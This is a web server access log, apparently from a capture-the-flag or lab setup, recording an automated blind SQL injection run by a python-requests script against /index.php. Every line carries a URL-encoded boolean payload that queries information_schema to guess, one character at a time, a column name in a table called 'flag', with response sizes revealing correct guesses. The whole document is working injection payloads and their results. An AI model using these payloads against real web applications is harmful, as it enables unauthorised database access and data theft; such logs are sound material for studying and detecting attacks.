172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'm',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'l',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'k',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'j',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'i',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'h',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'g',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'f',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'e',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'd',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'c',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'b',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'a',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 506 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'%C2%80',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 453 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'%7F',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'~',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'%7D',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'%7C',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'%7B',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'z',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'y',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'x',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'w',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'v',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'u',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20't',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20's',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'r',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'q',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'p',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'o',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'n',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'm',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'l',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 413 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'k',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'j',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'i',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'h',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'g',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 506 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'%C2%80',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 454 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'%7F',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'~',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'%7D',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'%7C',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'%7B',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'z',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'y',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'x',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'w',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'v',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'u',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20't',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20's',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'r',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'q',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'p',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'o',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'n',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'm',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'l',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'k',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'j',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'i',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'h',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'g',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'f',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'e',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'd',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'c',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'b',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'a',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'%60',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'_',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'%5E',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'%5D',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'%5C',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'%5B',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'Z',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'Y',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'X',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'W',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'V',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'U',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'T',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'S',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'R',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'Q',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'P',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'O',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'N',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'M',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'L',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
